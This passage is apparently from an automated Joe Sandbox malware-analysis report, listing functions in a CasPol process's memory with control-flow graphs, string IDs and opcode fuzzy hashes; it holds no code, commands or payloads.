887->959 960 1d3dd621 call 1d3dec6f 887->960 961 1d3dd621 call 1d3dedeb 887->961 962 1d3dd621 call 1d3de667 887->962 963 1d3dd621 call 1d3de363 887->963 964 1d3dd621 call 1d3ded63 887->964 965 1d3dd621 call 1d3de962 887->965 966 1d3dd621 call 1d3de8dd 887->966 967 1d3dd621 call 1d3def5d 887->967 968 1d3dd621 call 1d3de5d9 887->968 969 1d3dd621 call 1d3debdb 887->969 970 1d3dd621 call 1d3de84f 887->970 971 1d3dd621 call 1d3deec9 887->971 972 1d3dd621 call 1d3de54b 887->972 973 1d3dd621 call 1d3deb47 887->973 974 1d3dd621 call 1d3de4c6 887->974 975 1d3dd621 call 1d3de7c1 887->975 976 1d3dd621 call 1d3de342 887->976 889 1d3dd627-1d3dd629 890 1d3dd62b-1d3dd631 889->890 891 1d3dd641-1d3dd685 889->891 892 1d3dd635-1d3dd637 890->892 893 1d3dd633 890->893 895 1d3dd79d-1d3dd7b2 891->895 896 1d3dd68b-1d3dd797 891->896 892->891 893->891 899 1d3dd7b3 895->899 896->895 899->899 927->889 928->889 929->889 930->889 931->889 932->889 933->889 934->889 935->889 936->889 937->889 938->889 939->889 940->889 941->889 942->889 943->889 944->889 945->889 946->889 947->889 948->889 949->889 950->889 951->889 952->889 953->889 954->889 955->889 956->889 957->889 958->889 959->889 960->889 961->889 962->889 963->889 964->889 965->889 966->889 967->889 968->889 969->889 970->889 971->889 972->889 973->889 974->889 975->889 976->889
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LR)l
                                                                                  • API String ID: 0-2684121311
                                                                                  • Opcode ID: e26241e75c46da77a5d32d87206622893e3f1484876dbfa410365325b0e7d472
                                                                                  • Instruction ID: 5d94ef2c090f2268f401fe8451cb41eedab8416ca32b6dea27ce83b51ead901e
                                                                                  • Opcode Fuzzy Hash: e26241e75c46da77a5d32d87206622893e3f1484876dbfa410365325b0e7d472
                                                                                  • Instruction Fuzzy Hash: E541C134F103149FDB459FB588A85AE77B3AFCA214B10C438E806D7784DF34C84A8B89
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D3EF0 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 977 1d3d3ef0-1d3d3efd 978 1d3d3eff-1d3d3f0b 977->978 979 1d3d3f43-1d3d3f44 977->979 982 1d3d3f91-1d3d3fb5 978->982 983 1d3d3f11-1d3d3f39 call 1d3d0164 978->983 980 1d3d3f74-1d3d3f78 979->980 981 1d3d3f46-1d3d3f54 979->981 984 1d3d3f7a-1d3d3f7d 980->984 985 1d3d3f85 980->985 981->980 990 1d3d3f56-1d3d3f6e 981->990 994 1d3d3ffb-1d3d4021 982->994 995 1d3d3fb7-1d3d3fce 982->995 983->980 1006 1d3d3f3b-1d3d3f42 983->1006 984->985 989 1d3d3f8d-1d3d3f90 985->989 990->980 1004 1d3d3f70 990->1004 1002 1d3d4023-1d3d4025 994->1002 1012 1d3d4026-1d3d407b 994->1012 1001 1d3d3fd0-1d3d3fda 995->1001 995->1002 1001->1002 1008 1d3d3fdc-1d3d3ff9 1001->1008 1004->980 1006->979 1008->994 1008->1002 1019 1d3d4111 1012->1019 1020 1d3d4081-1d3d40b8 1012->1020 1021 1d3d4113-1d3d4117 1019->1021 1026 1d3d40ba-1d3d40bf 1020->1026 1027 1d3d40c1-1d3d40cd 1020->1027 1026->1021 1029 1d3d40d7-1d3d40f8 1027->1029 1032 1d3d40fe-1d3d410b 1029->1032 1033 1d3d40fa-1d3d40fc 1029->1033 1032->1019 1032->1020 1033->1021
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: d8.l
                                                                                  • API String ID: 0-4034604863
                                                                                  • Opcode ID: 17697b4f84759ddf4cd541abda5997ded5ef800282cfe30541f0397e2cd7a43b
                                                                                  • Instruction ID: 6dcac102f225f916ec18617bd3f9c7200c4bc062953157de6be6f4f8d3456950
                                                                                  • Opcode Fuzzy Hash: 17697b4f84759ddf4cd541abda5997ded5ef800282cfe30541f0397e2cd7a43b
                                                                                  • Instruction Fuzzy Hash: 16412332308B418FC310DB34C495B6ABBB1AF85204F458AA8E59ACF6B1CB30DC41CF82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D3068 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1035 1d3d3068-1d3d3070 1036 1d3d307c-1d3d3095 1035->1036 1037 1d3d3072-1d3d307b 1035->1037 1066 1d3d3097 call 1d3d31d9 1036->1066 1067 1d3d3097 call 1d3d31e8 1036->1067 1037->1036 1039 1d3d309d-1d3d30e2 1064 1d3d30e4 call 1d3d3870 1039->1064 1065 1d3d30e4 call 1d3d3860 1039->1065 1045 1d3d30ea-1d3d3108 1068 1d3d310a call 1d3d6670 1045->1068 1069 1d3d310a call 1d3d6660 1045->1069 1049 1d3d3110-1d3d3112 1050 1d3d316d-1d3d3191 1049->1050 1051 1d3d3114-1d3d3142 1049->1051 1056 1d3d319c 1050->1056 1057 1d3d3193 1050->1057 1070 1d3d3144 call 1d3d3870 1051->1070 1071 1d3d3144 call 1d3d3860 1051->1071 1057->1056 1060 1d3d314a-1d3d314c 1072 1d3d314f call 1d3d69b8 1060->1072 1073 1d3d314f call 1d3d69c8 1060->1073 1074 1d3d314f call 1d3d69a2 1060->1074 1061 1d3d3155-1d3d316b 1061->1050 1061->1051 1064->1045 1065->1045 1066->1039 1067->1039 1068->1049 1069->1049 1070->1060 1071->1060 1072->1061 1073->1061 1074->1061
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: PH)l
                                                                                  • API String ID: 0-2491596382
                                                                                  • Opcode ID: cf36c46dbf982acdcb7ac5f3a0766dff227c50a81d180d6ca1f129b26a3118df
                                                                                  • Instruction ID: 5dcd9a072155016c0fcf02d8eb1d0be77c47720482f7b6ab82a5dbe58d88f03f
                                                                                  • Opcode Fuzzy Hash: cf36c46dbf982acdcb7ac5f3a0766dff227c50a81d180d6ca1f129b26a3118df
                                                                                  • Instruction Fuzzy Hash: 1C31D735B002189BDB04DBB4889976F7BB2AF89255F044828E906EB380DF34DC81DBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DC620 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1075 1d3dc620-1d3dc67b 1083 1d3dc67d-1d3dc684 call 1d3dc1f4 1075->1083 1084 1d3dc697-1d3dc6af 1075->1084 1086 1d3dc689-1d3dc696 1083->1086
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LR)l
                                                                                  • API String ID: 0-2684121311
                                                                                  • Opcode ID: d3d31df156829cd7e07ade9ad31e036c5f108d77d889083b75e3bf7418438268
                                                                                  • Instruction ID: e187ce9d1168daca4540c2c276a3927370594e8b225616ef8b3352072d15586e
                                                                                  • Opcode Fuzzy Hash: d3d31df156829cd7e07ade9ad31e036c5f108d77d889083b75e3bf7418438268
                                                                                  • Instruction Fuzzy Hash: BE0128317082505FC7059BB488256DEBBB6AFCB200F0544ABC205CB7A2DF31AC49CBA7
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DC612 Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LR)l
                                                                                  • API String ID: 0-2684121311
                                                                                  • Opcode ID: 16214e1845cd1e887bee6850c287fbb94f08b1fbc6836097bcb6903facfd1b0a
                                                                                  • Instruction ID: ebfcdd16dc1ae925d7d53657d1cae80fe6a8472dcff5923bda72306b7c0cb76d
                                                                                  • Opcode Fuzzy Hash: 16214e1845cd1e887bee6850c287fbb94f08b1fbc6836097bcb6903facfd1b0a
                                                                                  • Instruction Fuzzy Hash: 5801D635B042105FC7059BB8C4246EDB7A6EFCA201B15856BC10ACBB95DF71EC49CBA6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D5C78 Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4')l
                                                                                  • API String ID: 0-1666011671
                                                                                  • Opcode ID: ac93788cbaafc6144732f574b94047e57184175b64294fc7da3d331009d3ab85
                                                                                  • Instruction ID: 5007c60a70c1f9b2148809ac858a0177c88986a30e1f3f59bace3caf94ff2f4f
                                                                                  • Opcode Fuzzy Hash: ac93788cbaafc6144732f574b94047e57184175b64294fc7da3d331009d3ab85
                                                                                  • Instruction Fuzzy Hash: 3EF06D30905309EFCB04DFB4E9A54CCBBB0AF4A204B5041E9C908EB251DB306E19CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D5C88 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4')l
                                                                                  • API String ID: 0-1666011671
                                                                                  • Opcode ID: 176c38d457fe39097a901c49c51df3ede81367704cb2848f2c27ee493aef058e
                                                                                  • Instruction ID: a311efea80ec80620d799ca6ec3929d29258deebd54ecff98aff8c88b4999615
                                                                                  • Opcode Fuzzy Hash: 176c38d457fe39097a901c49c51df3ede81367704cb2848f2c27ee493aef058e
                                                                                  • Instruction Fuzzy Hash: 14F08C30E0130EEFCB04EFB4D99548CBBB0AB45204F5045A8C509EB210EB306E09CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D540E Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: tQgn
                                                                                  • API String ID: 0-684793199
                                                                                  • Opcode ID: 26047c395a532a7d4b099074050913248dbdd9acfc058debf2bf24ec57096066
                                                                                  • Instruction ID: 966f1a2271990755eec4831e6814db45038c1e3d89e18722c7e1c76d608e8e23
                                                                                  • Opcode Fuzzy Hash: 26047c395a532a7d4b099074050913248dbdd9acfc058debf2bf24ec57096066
                                                                                  • Instruction Fuzzy Hash: C6E06D72D08709DBDB55CF60C9A97ED7BB1AB023A3F904528C006A61D1DF762985CF83
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D56A1 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `fn
                                                                                  • API String ID: 0-4196747816
                                                                                  • Opcode ID: f416da482e1b8438f2b2a1880f2a0175c3d5d83d0dde354f9fcee5161a512b0b
                                                                                  • Instruction ID: 44a624674304a01c3263be79d52d8d16360d8fab8197692214762f76822b2ba0
                                                                                  • Opcode Fuzzy Hash: f416da482e1b8438f2b2a1880f2a0175c3d5d83d0dde354f9fcee5161a512b0b
                                                                                  • Instruction Fuzzy Hash: B4E09275014714EBC7018F51E2A66847BB87B02314F808149C4080B2A2D3B2B5AD8FD3
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D56B0 Relevance: 1.3, Strings: 1, Instructions: 13COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `fn
                                                                                  • API String ID: 0-4196747816
                                                                                  • Opcode ID: 3d92834dc9d551c79f3203fc3e7b525f6f748178f8eb97099d7b700967b1a346
                                                                                  • Instruction ID: 01792cb2fbdef51500b755c01f45ca43a02bc3c248368279ac972c3281fa4571
                                                                                  • Opcode Fuzzy Hash: 3d92834dc9d551c79f3203fc3e7b525f6f748178f8eb97099d7b700967b1a346
                                                                                  • Instruction Fuzzy Hash: 56D05E75028328DBC7009B66D2A8B093BA9A746329F80C55CD4080B2A6C7B3F4598FC3
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE363 Relevance: .3, Instructions: 347COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 500cc41833775fa0c1274805ae1a298372c776eaa684ae061a6a962bc249a3f6
                                                                                  • Instruction ID: ecc2a0eb042ff230456919740fd685d6c198d70fe169b88ff0a1a87302219383
                                                                                  • Opcode Fuzzy Hash: 500cc41833775fa0c1274805ae1a298372c776eaa684ae061a6a962bc249a3f6
                                                                                  • Instruction Fuzzy Hash: 9802C775901328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE342 Relevance: .3, Instructions: 347COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 62450faec6af7470c197a5cf762a5dc065cd670730afb24e189d34610807ab04
                                                                                  • Instruction ID: 1cd321488b5c41a2d16b281dc49cc1d70586bdfd670a9a7630ca011bba351df7
                                                                                  • Opcode Fuzzy Hash: 62450faec6af7470c197a5cf762a5dc065cd670730afb24e189d34610807ab04
                                                                                  • Instruction Fuzzy Hash: 5902C875901328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE3AA Relevance: .3, Instructions: 340COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6d0dd74f077bd7483d0aa51cf3a8aa02051a0e1f45cd2a5d64c9928c0e11aa1e
                                                                                  • Instruction ID: ab3e08b3787997208480ba3d12b1b7ab537ec5c74bf99cec12a88d0102b0c161
                                                                                  • Opcode Fuzzy Hash: 6d0dd74f077bd7483d0aa51cf3a8aa02051a0e1f45cd2a5d64c9928c0e11aa1e
                                                                                  • Instruction Fuzzy Hash: 6C02D875901328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE3F1 Relevance: .3, Instructions: 333COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3a7082c14f93896559879684489e36474b50b0d2769404e25fe28f8064957815
                                                                                  • Instruction ID: 4365d949d8e0b2bf8ed1d138d619edd94eb002f44a67c2834a7ac73d314066ef
                                                                                  • Opcode Fuzzy Hash: 3a7082c14f93896559879684489e36474b50b0d2769404e25fe28f8064957815
                                                                                  • Instruction Fuzzy Hash: 3402C775901328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D45F0 Relevance: .3, Instructions: 331COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3ab963ec91adb19b29280dac38882e12c71edd0af5f6702ecef99539351ed0f3
                                                                                  • Instruction ID: 656dd14d71e60fa1fc27671627ea01110cb8e7843adbd33018326068fa505452
                                                                                  • Opcode Fuzzy Hash: 3ab963ec91adb19b29280dac38882e12c71edd0af5f6702ecef99539351ed0f3
                                                                                  • Instruction Fuzzy Hash: 6BC1DE31B042199FCB45DF64C895AAE77B6BF88344F558129E916DB3A0CB31DC82CF92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE438 Relevance: .3, Instructions: 326COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ac6f887db5ca2d80250a000bdf3105c7835cffca6146aaa0bbfae70c21f6a8d6
                                                                                  • Instruction ID: 2d69f1e062817f5733a8ee6996fda1321a519b265e345d72863d00c56a770ea5
                                                                                  • Opcode Fuzzy Hash: ac6f887db5ca2d80250a000bdf3105c7835cffca6146aaa0bbfae70c21f6a8d6
                                                                                  • Instruction Fuzzy Hash: 2D02C774901328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE47F Relevance: .3, Instructions: 319COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3667210ce1c3f9a6506506bbbae3cd5fe6831ec32d2cd0dc3186c86ed755c0d1
                                                                                  • Instruction ID: abfaf7a9496f1e60f63429f7a83d89915bb47fdd322496bff733103a27c3dc85
                                                                                  • Opcode Fuzzy Hash: 3667210ce1c3f9a6506506bbbae3cd5fe6831ec32d2cd0dc3186c86ed755c0d1
                                                                                  • Instruction Fuzzy Hash: A6F1C774901328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE4C6 Relevance: .3, Instructions: 312COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9eadd4e1bf933a8bf909d075cd128ad2a076e00e87645d4d031682b39430fd6f
                                                                                  • Instruction ID: 2fd36c292398077aa6d361d2ab5f6a3437c72866137e86ac1dc9ee735d90296d
                                                                                  • Opcode Fuzzy Hash: 9eadd4e1bf933a8bf909d075cd128ad2a076e00e87645d4d031682b39430fd6f
                                                                                  • Instruction Fuzzy Hash: 19F1C774901328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE50D Relevance: .3, Instructions: 303COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d906fda956cb27f815eb27af7b75cef6cefc63039698484c34582e2767034905
                                                                                  • Instruction ID: 87d0be15731572708c58a60803950dd80124b87098413a5fab4aba3c26c2946e
                                                                                  • Opcode Fuzzy Hash: d906fda956cb27f815eb27af7b75cef6cefc63039698484c34582e2767034905
                                                                                  • Instruction Fuzzy Hash: EEF1C835905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE54B Relevance: .3, Instructions: 298COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8fd19d5f774665b7fbd668afa5f1f65fec549b39b48a24c3507c0551a62d48dc
                                                                                  • Instruction ID: 82dc8a29e3483bf3dfc67853be3007f690f54602b5339b08d913f8cc50995624
                                                                                  • Opcode Fuzzy Hash: 8fd19d5f774665b7fbd668afa5f1f65fec549b39b48a24c3507c0551a62d48dc
                                                                                  • Instruction Fuzzy Hash: 0AF1C735905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE592 Relevance: .3, Instructions: 291COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3fe07c1a951acb98c0f91cef5acb3e132e8afce004cd91c3197f966f81561ec4
                                                                                  • Instruction ID: c5e1c3d2c9cdd666ca418843be92d2567de473d183dff8375de8ebd1671c015f
                                                                                  • Opcode Fuzzy Hash: 3fe07c1a951acb98c0f91cef5acb3e132e8afce004cd91c3197f966f81561ec4
                                                                                  • Instruction Fuzzy Hash: 6CE1C735905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE5D9 Relevance: .3, Instructions: 284COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 11a520c8234e721914ba2ae55cea24cc423aee70cd3d420973dc21b6e76f5d1a
                                                                                  • Instruction ID: 78ddf36119201930cc28b77c0a7333b06788da77e5c273ddfdcfaa3f1a01be82
                                                                                  • Opcode Fuzzy Hash: 11a520c8234e721914ba2ae55cea24cc423aee70cd3d420973dc21b6e76f5d1a
                                                                                  • Instruction Fuzzy Hash: 66E1C735905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE620 Relevance: .3, Instructions: 277COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 99864d37a5a24c4aab1f092121c6e9a54c9ca97df4e886494819ed01cd68c3e2
                                                                                  • Instruction ID: e64f0f9ec04ebbd21c3fb3dcb1f187a7a94d98d40f0c8f10f443c26f77f0c450
                                                                                  • Opcode Fuzzy Hash: 99864d37a5a24c4aab1f092121c6e9a54c9ca97df4e886494819ed01cd68c3e2
                                                                                  • Instruction Fuzzy Hash: 4BE1C734905328CFCBA5EF70D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE667 Relevance: .3, Instructions: 268COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
